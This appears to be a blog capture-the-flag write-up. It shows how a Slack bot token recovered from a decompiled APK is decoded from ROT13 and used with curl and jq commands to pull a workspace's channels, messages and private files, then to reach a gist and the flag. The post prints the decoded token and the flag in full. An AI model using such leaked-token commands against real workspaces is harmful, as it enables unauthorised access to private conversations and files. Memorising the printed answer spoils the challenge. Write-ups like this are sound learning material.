Insert ChatGPT code? No level is called – Instant Gratification
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-40.png?resize=1024%2C402&ssl=1)
This level gave an apk and form to submit the code.
Download and decompile the apk file. I use JADX-GUI.
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-41.png?resize=1024%2C380&ssl=1)
There is a leaked Slack API token.
It is ROT13 as the code suggests.
Back to CyberChef to get the ROT13 value of token.xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb
Used this token to get all channels.
curl "https://slack.com/api/conversations.list" -H 'Authorization:
Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channels.json
Too many channels. Now get all the messages in all channels.
cat channels.json | jq '.channels[].id' | xargs -I {} -P 10 curl "https://slack.com/api/conversations.history?channel={}&pretty=1" -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' -o channel-chat-{}.json
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-42.png?resize=1024%2C637&ssl=1)
A lot of messages by bots U05N6PBAFEJ
. Let’s filter that out
cat channel-chat-* | jq '.messages[]|select(.user != "U05N6PBAFEJ")' > all.json
all.json
have all the messages by members of that Slack workspace and the have shared some files.
But the hint is in flag_txt.txt
curl -H 'Authorization: Bearer xoxb-5729419145606-5750052480419-NCuEloorjXP8vW3AWyprQWRb' https://files.slack.com/files-pri/T05MFCB49HU-F0
5NS2L16SD/flag_txt.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-43.png?resize=942%2C516&ssl=1)
Who shared this file? User U05ND262075
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-44.png?resize=942%2C395&ssl=1)
Using Slack API, found out the username udhaya.prakash. Found his GitHub and Gist and got access to the gist mentioned in flag_txt.txt
https://gist.github.com/sherlocksecurity/d45842c1a9849bd42bb3513d6769c0fe
Ran the javascript code in Gist and found the flag XNYTH&6GjgSj7Z
Submitted it in the form and got the flag.
Leave a Reply